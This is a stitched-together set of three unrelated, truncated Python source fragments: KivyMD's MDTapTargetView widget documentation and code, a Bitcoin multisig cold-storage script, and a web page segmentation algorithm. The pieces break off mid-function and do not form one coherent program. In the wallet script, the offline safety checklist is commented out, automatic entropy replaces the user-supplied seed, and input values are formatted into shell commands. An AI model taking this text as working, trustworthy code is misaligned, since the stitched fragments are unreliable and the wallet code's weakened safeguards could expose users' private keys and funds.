id: button
icon: "plus"
pos: 10, 10
on_release: app.tap_target_start()
'''
class TapTargetViewDemo(MDApp):
def build(self):
screen = Builder.load_string(KV)
self.tap_target_view = MDTapTargetView(
widget=screen.ids.button,
title_text="This is an add button",
description_text="This is a description of the button",
widget_position="left_bottom",
)
return screen
def tap_target_start(self):
if self.tap_target_view.state == "close":
self.tap_target_view.start()
else:
self.tap_target_view.stop()
TapTargetViewDemo().run()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-usage.gif
:align: center
Widget position
---------------
Sets the position of the widget relative to the floating circle.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="right",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-right.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="left",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-left.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-top.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="bottom",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-bottom.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="left_top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-left_top.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="right_top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-right_top.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="left_bottom",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-left_bottom.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="right_bottom",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-right_bottom.png
:align: center
If you use ``the widget_position = "center"`` parameter then you must
definitely specify the :attr:`~MDTapTargetView.title_position`.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="center",
title_position="left_top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-center.png
:align: center
Text options
------------
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
title_text="Title text",
description_text="Description text",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-text.png
:align: center
You can use the following options to control font size, color, and boldness:
- :attr:`~MDTapTargetView.title_text_size`
- :attr:`~MDTapTargetView.title_text_color`
- :attr:`~MDTapTargetView.title_text_bold`
- :attr:`~MDTapTargetView.description_text_size`
- :attr:`~MDTapTargetView.description_text_color`
- :attr:`~MDTapTargetView.description_text_bold`
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
title_text="Title text",
title_text_size="36sp",
description_text="Description text",
description_text_color=[1, 0, 0, 1]
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-text-option.png
:align: center
But you can also use markup to set these values.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
title_text="[size=36]Title text[/size]",
description_text="[color=#ff0000ff]Description text[/color]",
)
Events control
--------------
.. code-block:: python
self.tap_target_view.bind(on_open=self.on_open, on_close=self.on_close)
.. code-block:: python
def on_open(self, instance_tap_target_view):
'''Called at the time of the start of the widget opening animation.'''
print("Open", instance_tap_target_view)
def on_close(self, instance_tap_target_view):
'''Called at the time of the start of the widget closed animation.'''
print("Close", instance_tap_target_view)
.. Note:: See other parameters in the :class:`~MDTapTargetView` class.
"""
from kivy.animation import Animation
from kivy.event import EventDispatcher
from kivy.graphics import Color, Ellipse, Rectangle
from kivy.logger import Logger
from kivy.metrics import dp
from kivy.properties import (
BooleanProperty,
ListProperty,
NumericProperty,
ObjectProperty,
OptionProperty,
StringProperty,
)
from kivy.uix.label import Label
from kivymd.theming import ThemableBehavior
class MDTapTargetView(ThemableBehavior, EventDispatcher):
"""Rough try to mimic the working of Android's TapTargetView.
:Events:
:attr:`on_open`
Called at the time of the start of the widget opening animation.
:attr:`on_close`
Called at the time of the start of the widget closed animation.
"""
widget = ObjectProperty()
"""
Widget to add ``TapTargetView`` upon.
:attr:`widget` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `None`.
"""
outer_radius = NumericProperty(dp(200))
"""
Radius for outer circle.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-outer-radius.png
:align: center
:attr:`outer_radius` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(200)`.
"""
outer_circle_color = ListProperty()
"""
Color for the outer circle in ``rgb`` format.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
outer_circle_color=(1, 0, 0)
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-outer-circle-color.png
:align: center
:attr:`outer_circle_color` is an :class:`~kivy.properties.ListProperty`
and defaults to ``theme_cls.primary_color``.
"""
outer_circle_alpha = NumericProperty(0.96)
"""
Alpha value for outer circle.
:attr:`outer_circle_alpha` is an :class:`~kivy.properties.NumericProperty`
and defaults to `0.96`.
"""
target_radius = NumericProperty(dp(45))
"""
Radius for target circle.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-target-radius.png
:align: center
:attr:`target_radius` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(45)`.
"""
target_circle_color = ListProperty([1, 1, 1])
"""
Color for target circle in ``rgb`` format.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
target_circle_color=(1, 0, 0)
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-target-circle-color.png
:align: center
:attr:`target_circle_color` is an :class:`~kivy.properties.ListProperty`
and defaults to `[1, 1, 1]`.
"""
title_text = StringProperty()
"""
Title to be shown on the view.
:attr:`title_text` is an :class:`~kivy.properties.StringProperty`
and defaults to `''`.
"""
title_text_size = NumericProperty(dp(25))
"""
Text size for title.
:attr:`title_text_size` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(25)`.
"""
title_text_color = ListProperty([1, 1, 1, 1])
"""
Text color for title.
:attr:`title_text_color` is an :class:`~kivy.properties.ListProperty`
and defaults to `[1, 1, 1, 1]`.
"""
title_text_bold = BooleanProperty(True)
"""
Whether title should be bold.
:attr:`title_text_bold` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `True`.
"""
description_text = StringProperty()
"""
Description to be shown below the title (keep it short).
:attr:`description_text` is an :class:`~kivy.properties.StringProperty`
and defaults to `''`.
"""
description_text_size = NumericProperty(dp(20))
"""
Text size for description text.
:attr:`description_text_size` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(20)`.
"""
description_text_color = ListProperty([0.9, 0.9, 0.9, 1])
"""
Text size for description text.
:attr:`description_text_color` is an :class:`~kivy.properties.ListProperty`
and defaults to `[0.9, 0.9, 0.9, 1]`.
"""
description_text_bold = BooleanProperty(False)
"""
Whether description should be bold.
:attr:`description_text_bold` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
draw_shadow = BooleanProperty(False)
"""
Whether to show shadow.
:attr:`draw_shadow` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
cancelable = BooleanProperty(False)
"""
Whether clicking outside the outer circle dismisses the view.
:attr:`cancelable` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
widget_position = OptionProperty(
"left",
options=[
"left",
"right",
"top",
"bottom",
"left_top",
"right_top",
"left_bottom",
"right_bottom",
"center",
],
)
"""
Sets the position of the widget on the :attr:`~outer_circle`. Available options are
`'left`', `'right`', `'top`', `'bottom`', `'left_top`', `'right_top`',
`'left_bottom`', `'right_bottom`', `'center`'.
:attr:`widget_position` is an :class:`~kivy.properties.OptionProperty`
and defaults to `'left'`.
"""
title_position = OptionProperty(
"auto",
options=[
"auto",
"left",
"right",
"top",
"bottom",
"left_top",
"right_top",
"left_bottom",
"right_bottom",
],
)
"""
Sets the position of :attr`~title_text` on the outer circle. Only works if
:attr`~widget_position` is set to `'center'`. In all other cases, it
calculates the :attr`~title_position` itself.
Must be set to other than `'auto`' when :attr`~widget_position` is set
to `'center`'.
Available options are `'auto'`, `'left`', `'right`', `'top`', `'bottom`',
`'left_top`', `'right_top`', `'left_bottom`', `'right_bottom`', `'center`'.
:attr:`title_position` is an :class:`~kivy.properties.OptionProperty`
and defaults to `'auto'`.
"""
stop_on_outer_touch = BooleanProperty(False)
"""
Whether clicking on outer circle stops the animation.
:attr:`stop_on_outer_touch` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
stop_on_target_touch = BooleanProperty(True)
"""
Whether clicking on target circle should stop the animation.
:attr:`stop_on_target_touch` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `True`.
"""
state = OptionProperty("close", options=["close", "open"])
"""
State of :class:`~MDTapTargetView`.
:attr:`state` is an :class:`~kivy.properties.OptionProperty`
and defaults to `'close'`.
"""
_outer_radius = NumericProperty(0)
_target_radius = NumericProperty(0)
def __init__(self, **kwargs):
self.ripple_max_dist = dp(90)
self.on_outer_radius(self, self.outer_radius)
self.on_target_radius(self, self.target_radius)
self.anim_ripple = None
self.core_title_text = Label(
markup=True, size_hint=(None, None), bold=self.title_text_bold
)
self.core_title_text.bind(
texture_size=self.core_title_text.setter("size")
)
self.core_description_text = Label(markup=True, size_hint=(None, None))
self.core_description_text.bind(
texture_size=self.core_description_text.setter("size")
)
super().__init__(**kwargs)
self.register_event_type("on_outer_touch")
self.register_event_type("on_target_touch")
self.register_event_type("on_outside_click")
self.register_event_type("on_open")
self.register_event_type("on_close")
if not self.outer_circle_color:
self.outer_circle_color = self.theme_cls.primary_color[:-1]
def _initialize(self):
setattr(self.widget, "_outer_radius", 0)
setattr(self.widget, "_target_radius", 0)
setattr(self.widget, "target_ripple_radius", 0)
setattr(self.widget, "target_ripple_alpha", 0)
# Bind some function on widget event when this function is called
# instead of when the class itself is initialized to prevent all
# widgets of all instances to get bind at once and start messing up.
self.widget.bind(on_touch_down=self._some_func)
def _draw_canvas(self):
_pos = self._ttv_pos()
self.widget.canvas.before.clear()
with self.widget.canvas.before:
# Outer circle.
Color(
*self.outer_circle_color,
self.outer_circle_alpha,
group="ttv_group",
)
_rad1 = self.widget._outer_radius
Ellipse(size=(_rad1, _rad1), pos=_pos[0], group="ttv_group")
# Title text.
Color(*self.title_text_color, group="ttv_group")
Rectangle(
size=self.core_title_text.texture.size,
texture=self.core_title_text.texture,
pos=_pos[1],
group="ttv_group",
)
# Description text.
Color(*self.description_text_color, group="ttv_group")
Rectangle(
size=self.core_description_text.texture.size,
texture=self.core_description_text.texture,
pos=(
_pos[1][0],
_pos[1][1] - self.core_description_text.size[1] - 5,
),
group="ttv_group",
)
# Target circle.
Color(*self.target_circle_color, group="ttv_group")
_rad2 = self.widget._target_radius
Ellipse(
size=(_rad2, _rad2),
pos=(
self.widget.x - (_rad2 / 2 - self.widget.size[0] / 2),
self.widget.y - (_rad2 / 2 - self.widget.size[0] / 2),
),
group="ttv_group",
)
# Target ripple.
Color(
*self.target_circle_color,
self.widget.target_ripple_alpha,
group="ttv_group",
)
_rad3 = self.widget.target_ripple_radius
Ellipse(
size=(_rad3, _rad3),
pos=(
self.widget.x - (_rad3 / 2 - self.widget.size[0] / 2),
self.widget.y - (_rad3 / 2 - self.widget.size[0] / 2),
),
group="ttv_group",
)
def stop(self, *args):
"""Starts widget close animation."""
# It needs a better implementation.
if self.anim_ripple is not None:
self.anim_ripple.unbind(on_complete=self._repeat_ripple)
self.core_title_text.opacity = 0
self.core_description_text.opacity = 0
anim = Animation(
d=0.15,
t="in_cubic",
**dict(
zip(
["_outer_radius", "_target_radius", "target_ripple_radius"],
[0, 0, 0],
)
),
)
anim.bind(on_complete=self._after_stop)
anim.start(self.widget)
def _after_stop(self, *args):
self.widget.canvas.before.remove_group("ttv_group")
args[0].stop_all(self.widget)
elev = getattr(self.widget, "elevation", None)
if elev:
self._fix_elev()
self.dispatch("on_close")
# Don't forget to unbind the function or it'll mess
# up with other next bindings.
self.widget.unbind(on_touch_down=self._some_func)
self.state = "close"
def _fix_elev(self):
with self.widget.canvas.before:
Color(a=self.widget._soft_shadow_a)
Rectangle(
texture=self.widget._soft_shadow_texture,
size=self.widget._soft_shadow_size,
pos=self.widget._soft_shadow_pos,
| |
no address decoded
continue
out_addresses = output["scriptPubKey"]["addresses"]
amount_btc = output["value"]
if address in out_addresses:
utxos.append(output)
return utxos
def create_unsigned_transaction(source_address, destinations, redeem_script, input_txs):
"""
Returns a hex string representing an unsigned bitcoin transaction
returns => <string>
source_address: <string> input_txs will be filtered for utxos to this source address
destinations: {address <string>: amount<string>} dictionary mapping destination addresses to amount in BTC
redeem_script: <string>
input_txs: List<dict> List of input transactions in dictionary form (bitcoind decoded format)
"""
ensure_bitcoind_running()
# prune destination addresses sent 0 btc
destinations = OrderedDict((key, val) for key, val in destinations.items() if val != '0')
# For each UTXO used as input, we need the txid and vout index to generate a transaction
inputs = []
for tx in input_txs:
utxos = get_utxos(tx, source_address)
txid = tx["txid"]
for utxo in utxos:
inputs.append(OrderedDict([
("txid", txid),
("vout", int(utxo["n"]))
]))
tx_unsigned_hex = bitcoin_cli_checkoutput(
"createrawtransaction",
json.dumps(inputs),
json.dumps(destinations)).strip()
return tx_unsigned_hex
def sign_transaction(source_address, keys, redeem_script, unsigned_hex, input_txs):
"""
Creates a signed transaction
output => dictionary {"hex": transaction <string>, "complete": <boolean>}
source_address: <string> input_txs will be filtered for utxos to this source address
keys: List<string> The private keys you wish to sign with
redeem_script: <string>
unsigned_hex: <string> The unsigned transaction, in hex format
input_txs: List<dict> A list of input transactions to use (bitcoind decoded format)
"""
# For each UTXO used as input, we need the txid, vout index, scriptPubKey, amount, and redeemScript
# to generate a signature
inputs = []
for tx in input_txs:
utxos = get_utxos(tx, source_address)
txid = tx["txid"]
for utxo in utxos:
inputs.append({
"txid": txid,
"vout": int(utxo["n"]),
"amount": utxo["value"],
"scriptPubKey": utxo["scriptPubKey"]["hex"],
"redeemScript": redeem_script
})
signed_tx = bitcoin_cli_json(
"signrawtransactionwithkey",
unsigned_hex, json.dumps(keys), json.dumps(inputs))
return signed_tx
def get_fee_interactive(source_address, keys, destinations, redeem_script, input_txs):
"""
Returns a recommended transaction fee, given market fee data provided by the user interactively
Because fees tend to be a function of transaction size, we build the transaction in order to
recomend a fee.
return => <Decimal> fee value
Parameters:
source_address: <string> input_txs will be filtered for utxos to this source address
keys: A list of signing keys
destinations: {address <string>: amount<string>} dictionary mapping destination addresses to amount in BTC
redeem_script: String
input_txs: List<dict> List of input transactions in dictionary form (bitcoind decoded format)
fee_basis_satoshis_per_byte: <int> optional basis for fee calculation
"""
MAX_FEE = .005 # in btc. hardcoded limit to protect against user typos
ensure_bitcoind_running()
approve = False
while not approve:
print("\nEnter fee rate.")
fee_basis_satoshis_per_byte = int(input("Satoshis per vbyte: "))
unsigned_tx = create_unsigned_transaction(
source_address, destinations, redeem_script, input_txs)
signed_tx = sign_transaction(source_address, keys,
redeem_script, unsigned_tx, input_txs)
decoded_tx = bitcoin_cli_json("decoderawtransaction", signed_tx["hex"])
size = decoded_tx["vsize"]
fee = size * fee_basis_satoshis_per_byte
fee = satoshi_to_btc(fee)
if fee > MAX_FEE:
print("Calculated fee ({}) is too high. Must be under {}".format(fee, MAX_FEE))
else:
print("\nBased on the provided rate, the fee will be {} bitcoin.".format(fee))
confirm = yes_no_interactive()
if confirm:
approve = True
else:
print("\nFee calculation aborted. Starting over...")
return fee
################################################################################################
#
# QR code helper functions
#
################################################################################################
def write_and_verify_qr_code(name, filename, data):
"""
Write a QR code and then read it back to try and detect any tricksy malware tampering with it.
name: <string> short description of the data
filename: <string> filename for storing the QR code
data: <string> the data to be encoded
"""
subprocess.call("qrencode -o {0} {1}".format(filename, data), shell=True)
check = subprocess.check_output(
"zbarimg --set '*.enable=0' --set 'qr.enable=1' --quiet --raw {}".format(filename), shell=True)
if check.decode('ascii').strip() != data:
print("********************************************************************")
print("WARNING: {} QR code could not be verified properly. This could be a sign of a security breach.".format(name))
print("********************************************************************")
print("QR code for {0} written to {1}".format(name, filename))
################################################################################################
#
# User sanity checking
#
################################################################################################
def yes_no_interactive():
def confirm_prompt():
return input("Confirm? (y/n): ")
confirm = confirm_prompt()
while True:
if confirm.upper() == "Y":
return True
if confirm.upper() == "N":
return False
else:
print("You must enter y (for yes) or n (for no).")
confirm = confirm_prompt()
def safety_checklist():
checks = [
"Are you running this on a computer WITHOUT a network connection of any kind?",
"Have the wireless cards in this computer been physically removed?",
"Are you running on battery power?",
"Are you running on an operating system booted from a USB drive?",
"Is your screen hidden from view of windows, cameras, and other people?",
"Are smartphones and all other nearby devices turned off and in a Faraday bag?"]
for check in checks:
answer = input(check + " (y/n)?")
if answer.upper() != "Y":
print("\n Safety check failed. Exiting.")
sys.exit()
################################################################################################
#
# Main "entropy" function
#
################################################################################################
def unchunk(string):
"""
Remove spaces in string
"""
return string.replace(" ", "")
def chunk_string(string, length):
"""
Splits a string into chunks of [length] characters, for easy human readability
Source: https://stackoverflow.com/a/18854817/11031317
"""
return (string[0+i:length+i] for i in range(0, len(string), length))
def entropy(n, length):
"""
Generate n random strings for the user from /dev/random
"""
#safety_checklist()
print("\n\n")
print("Making {} random data strings....".format(n))
print("If strings don't appear right away, please continually move your mouse cursor. These movements generate entropy which is used to create random data.\n")
idx = 0
entropies = []
while idx < n:
seed = subprocess.check_output(
"xxd -l {} -p /dev/random".format(length), shell=True)
idx += 1
seed = seed.decode('ascii').replace('\n', '')
print("Computer entropy #{0}: {1}".format(idx, " ".join(chunk_string(seed, 4))))
entropies.append("".join(chunk_string(seed,4)))
return entropies
################################################################################################
#
# Main "deposit" function
#
################################################################################################
def deposit_interactive(m, n, dice_seed_length=62, rng_seed_length=20):
"""
Generate data for a new cold storage address (private keys, address, redemption script)
m: <int> number of multisig keys required for withdrawal
n: <int> total number of multisig keys
dice_seed_length: <int> minimum number of dice rolls required
rng_seed_length: <int> minimum length of random seed required
"""
#safety_checklist()
ensure_bitcoind_running()
require_minimum_bitcoind_version(170000) # getaddressesbylabel API new in v0.17.0
print("\n")
print("Creating {0}-of-{1} cold storage address.\n".format(m, n))
keys = []
entropies = entropy(n, 20)
while len(keys) < n:
index = len(keys) + 1
print("\n==========================================")
print("Creating private key #{}".format(index))
dice_seed_string = read_dice_seed_interactive(dice_seed_length)
dice_seed_hash = hash_sha256(dice_seed_string)
#rng_seed_string = read_rng_seed_interactive(rng_seed_length)
rng_seed_string = entropies[index-1]
print("USED ENTROPY", index-1, "WHICH IS: ", entropies[index-1])
rng_seed_hash = hash_sha256(rng_seed_string)
# back to hex string
hex_private_key = xor_hex_strings(dice_seed_hash, rng_seed_hash)
WIF_private_key = hex_private_key_to_WIF_private_key(hex_private_key)
keys.append(WIF_private_key)
print("Private keys created.")
print("Generating {0}-of-{1} cold storage address...\n".format(m, n))
addresses = [get_address_for_wif_privkey(key) for key in keys]
results = addmultisigaddress(m, addresses)
print("Private keys:")
for idx, key in enumerate(keys):
print("Key #{0}: {1}".format(idx + 1, key))
print("\nCold storage address:")
print("{}".format(results["address"]))
print("\nRedemption script:")
print("{}".format(results["redeemScript"]))
print("")
write_and_verify_qr_code("cold storage address", "address.png", results["address"])
write_and_verify_qr_code("redemption script", "redemption.png", results["redeemScript"])
################################################################################################
#
# Main "withdraw" function
#
################################################################################################
def withdraw_interactive():
"""
Construct and sign a transaction to withdaw funds from cold storage
All data required for transaction construction is input at the terminal
"""
#safety_checklist()
ensure_bitcoind_running()
require_minimum_bitcoind_version(170000) # signrawtransaction API changed in v0.17.0
approve = False
while not approve:
addresses = OrderedDict()
print("\nYou will need to enter several pieces of information to create a withdrawal transaction.")
print("\n\n*** PLEASE BE SURE TO ENTER THE CORRECT DESTINATION ADDRESS ***\n")
source_address = input("\nSource cold storage address: ")
addresses[source_address] = 0
redeem_script = input("\nRedemption script for source cold storage address: ")
dest_address = input("\nDestination address: ")
addresses[dest_address] = 0
num_tx = int(input("\nHow many unspent transactions will you be using for this withdrawal? "))
txs = []
utxos = []
utxo_sum = Decimal(0).quantize(SATOSHI_PLACES)
while len(txs) < num_tx:
print("\nPlease paste raw transaction #{} (hexadecimal format) with unspent outputs at the source address".format(len(txs) + 1))
print("OR")
print("input a filename located in the current directory which contains the raw transaction data")
print("(If the transaction data is over ~4000 characters long, you _must_ use a file.):")
hex_tx = input()
if os.path.isfile(hex_tx):
hex_tx = open(hex_tx).read().strip()
tx = bitcoin_cli_json("decoderawtransaction", hex_tx)
txs.append(tx)
utxos += get_utxos(tx, source_address)
if len(utxos) == 0:
print("\nTransaction data not found for source address: {}".format(source_address))
sys.exit()
else:
print("\nTransaction data found for source address.")
for utxo in utxos:
value = Decimal(utxo["value"]).quantize(SATOSHI_PLACES)
utxo_sum += value
print("TOTAL unspent amount for this raw transaction: {} BTC".format(utxo_sum))
print("\nHow many private keys will you be signing this transaction with? ")
key_count = int(input("#: "))
keys = []
while len(keys) < key_count:
key = input("Key #{0}: ".format(len(keys) + 1))
keys.append(key)
###### fees, amount, and change #######
input_amount = utxo_sum
fee = get_fee_interactive(
source_address, keys, addresses, redeem_script, txs)
if fee > input_amount:
print("ERROR: Your fee is greater | |
<reponame>Del2909/Online-concencus-app
####################################################################
# Licence: Creative Commons (see COPYRIGHT) #
# Authors: <NAME>, <NAME> #
# {nik0spapp, <EMAIL> #
# Supervisor: <NAME> #
# <EMAIL> #
# University of the Aegean #
# Department of Information and Communication Systems Engineering #
# Information Management Track (MSc) #
# Karlovasi, Samos #
# Greece #
####################################################################
import sys
import re
import requests
import copy
import nltk
from region import Region
from lxml import etree, html
from lxml.html import HtmlComment
from lxml.html.clean import Cleaner
from terminal_colors import Tcolors
VALID_TAGS = ['div','td','span','p','form','dd','dt','li']
STRONG_TAGS = ['div','td','dd','dt','li']
MODEL_TAGS = ["article", "comments", "multiple_regions"]
TAGS = ['a','img','strong','b','i','br','script','style',
'h4','h5','h6','strong', 'noscript','em','center']
ARGS = {'meta':False, 'safe_attrs_only':False, 'page_structure':False,
'scripts':True, 'style':True, 'links':True, 'remove_tags':TAGS}
T1 = 50 # max density region distance threshold
T2 = 20 # min region density threshold
class SDAlgorithm():
def __init__(self):
self.valid_nodes = {}
self.regions = []
self.max_region = None
self.max_region_density = None
self.min_region_level = 10000
self.min_region_level_counter = 0
self.page_model = None
self.url = None
self.totalarticle = ""
def analyze_page(self):
print("[*] Create DOM tree...")
tree = self.construct_page_tree()
node = tree.getroot()
self.cross_tree(node)
print("[*] Calculating initial groups...")
print("[*] Merging groups...")
self.merge_groups(tree)
print("[*] Creating regions...")
self.create_regions(tree)
print("[*] Calculating distances from max region...")
self.calculate_distances_from_max(tree)
print("[*] Printing regions...\n")
for region in self.regions:
region._print()
article, comments, multiple = self.classify_page()
if article is not None and comments is None:
self.totalarticle = article.full_text
return 'article', article, None, None
elif article is not None:
self.totalarticle = article.full_text
return 'comment', article, comments
else:
return 'multiple', None, None, multiple
def construct_page_tree(self):
"""
Downloads the HTML page given the URL and creates the DOM page tree.
Only the nodes that are useful for the segmentation are kept.
"""
#Gotta fix the input variable
page = requests.get(self.url)
html_body = page.text
doc = html.fromstring(html_body)
cleaner = Cleaner(**ARGS)
try:
doc = cleaner.clean_html(doc)
except:
pass
tree = doc.getroottree()
return tree
def classify_page(self):
"""
Characterize the page according to i) has main article (has_article()),
ii) has main article with comments (is_full_article()), iii) has multiple
opinions like a forum (is_discussion()).
"""
validated = False
[biggest_regions, grouped_comments]= self.group_regions()
[article_exists, article] = self.has_article(biggest_regions)
if article_exists:
max_group = self.get_candidate_article(article, grouped_comments)
if max_group in grouped_comments:
if grouped_comments != {}:
validated = self.candidate_group_level_validated(max_group, article, grouped_comments)
context_validated = self.candidate_context_validated(article, grouped_comments, max_group)
if self.big_areas_in_same_level(article, grouped_comments, max_group) and not validated:
print(Tcolors.INFO + " Multiple similar regions detected!")
print("Class: ")
print(Tcolors.RES + " " + grouped_comments[max_group][0].class_name)
print("Texts: ")
for reg in grouped_comments[max_group]:
print(reg.full_text)
return None, None, grouped_comments[max_group]
elif not context_validated:
print()
self.print_article(article)
print()
print(Tcolors.INFO + " No comments found.")
return article, None, None
elif context_validated:
print()
print(Tcolors.INFO + " Article with comments detected!")
self.print_article(article)
print()
print("Comment class:")
print(Tcolors.RES + " " + max_group)
print("Comments:")
for com in grouped_comments[max_group]:
print(com.full_text)
return article, grouped_comments[max_group], None
else:
self.print_article(article)
return article, None, None
else:
print(Tcolors.INFO + " Multiple similar regions detected!")
print(Tcolors.RES)
print("Texts: ")
for reg in biggest_regions:
print(reg.full_text)
return None, None, biggest_regions
def group_regions(self):
"""
Compute and return two groups of regions, namely the one for those that have
distance smaller or equal to the max density region distance threshold (T1)
and the second the regions that can be grouped based on their CSS classes.
"""
biggest_regions = []
grouped_comments = {}
for region in self.regions:
if region.distance_from_max <= T1:
biggest_regions.append(region)
if region.distance_from_root < self.min_region_level \
and self.combined_region_level_exceeded(region):
self.min_region_level_counter += 1
self.min_region_level = region.distance_from_root
pr_com = (len(region.tree.xpath(region.root)) > 0 and\
'class' in region.tree.xpath(region.root)[0].getparent().attrib and \
region.tree.xpath(region.root)[0].getparent().attrib["class"].count('comment') > 0)
if region.distance_from_max != 0 and (region.class_name != "" or \
(region.class_name == "" and pr_com)):
if region.class_name not in grouped_comments:
grouped_comments[region.class_name] = [region]
else:
grouped_comments[region.class_name].append(region)
return biggest_regions, grouped_comments
def combined_region_level_exceeded(self, region):
"""
Check whether the candidate article region is close to the root
and has an HTML title in some of its nearest ancestors.
"""
level = region.distance_from_root
title_level = region.ancestor_title_level
return level - title_level > level / 2
def has_article(self, biggest_regions):
"""
Check whether the candidate regions have a potential article and
return the possible candidate.
"""
article_region = None
if len(biggest_regions)==1:
return True, biggest_regions[0]
elif biggest_regions is None:
return False, None
biggest_regions = [reg for reg in biggest_regions if reg.ancestor_title\
is not None and reg.distance_from_root <= self.min_region_level\
and self.combined_region_level_exceeded(reg)]
if self.min_region_level_counter > 1 or biggest_regions == []:
pass
else:
article_region = self.find_article_region(biggest_regions)
if article_region:
return True, article_region
return False, article_region
def find_article_region(self, biggest_regions):
"""
Return the region that has the minimum title level among the
biggest regions.
"""
region_min_title_level = None
min_title_level = 1000
for reg in biggest_regions:
if reg.ancestor_title_level < min_title_level:
min_title_level = reg.ancestor_title_level
region_min_title_level = reg
article = region_min_title_level
return article
def get_candidate_article(self, article, grouped_comments):
"""
Check whether the candidate article region is on the same level with the
candidate group of comments and return the maximum density group that
the candidate article belongs to.
"""
min_dist = 1000
max_path_level = 0
min_dist_group = None
max_group_density = 0
if article.root_node.getparent() is not None:
article_parent_path = self.get_path(article.root_node.getparent())
else:
article_parent_path = ""
max_group = None
groups_level = {}
groups_below_article_tags = []
if grouped_comments is not None:
groups_tuple = list(grouped_comments.items())
for group in groups_tuple:
if group[1][0].root != article.root:
comment_parent_path = self.get_path(group[1][0].root_node.getparent())
common_path = self.extract_common(article_parent_path,comment_parent_path)
common_path_level = common_path.count("/")
comment_path_level = comment_parent_path.count("/")
article_level = article_parent_path.count("/")
groups_level[group[0]] = common_path_level
equal = comment_path_level == article_level
if common_path_level > max_path_level and common_path_level <= article_level :
max_path_level = common_path_level
groups_below_article_tags = [group[0] for group in list(groups_level.items()) if \
group[1]==max_path_level]
for group in groups_below_article_tags:
group_density = self.find_group_density(grouped_comments[group])
if group_density > max_group_density:
max_group_density = group_density
max_group = group
return max_group
def extract_common(self, a, b):
"""
Extract common path between two node paths.
"""
m = min(len(a), len(b))
for i in range(m):
if a[i] != b[i]:
return self.common_path(a[:i])
return self.common_path(a[:m])
def common_path(self, a):
"""
Parse the string of the path of a given node and find the
closest valid position for a legitimate path.
"""
if (len(a) - 1) >= 0 and (a.endswith("[") or a[len(a)-1].isdigit()):
a_arr = a.split("/")
a_final = a_arr[:len(a_arr) - 1]
a = "/".join(a_final)
elif a.endswith("/"):
a = a[:len(a) - 1]
return a
def find_group_density(self, groups):
"""
Find the group with the maximum density with respect to the number
of characters that are included in their content.
"""
total_density = 0
for region in groups:
for content in region.contents:
content_text = region.root_node.xpath(content)[0].text_content()
if content_text is not None:
total_density += len(re.sub(r" |\n|\r|\t","",content_text))
return total_density
def candidate_group_level_validated(self, max_group, article, grouped_comments):
"""
Validate whether the maximum detected group qualifies for an article.
"""
validated = True
article_path = article.root
comment_path = grouped_comments[max_group][0].root
common = self.extract_common(article_path, comment_path)
article_path = article_path.replace(common, "")
comment_path = comment_path.replace(common,"")
article_remaining_nodes = article_path.split("/")
comment_remaining_nodes = comment_path.split("/")
if len(article_remaining_nodes) > 1 and len(comment_remaining_nodes) > 1:
article_number = re.search("\d",article_remaining_nodes[0])
comment_number = re.search("\d",comment_remaining_nodes[0])
if article_number and comment_number:
article_number.start()
comment_number.start()
if article_number >= comment_number:
del grouped_comments[max_group]
validated = False
else:
comment_not_found = True
validated = False
try:
common_node = article.tree.xpath(common)
except:
common_node = []
if common_node != []:
for child in common_node[0].iterdescendants():
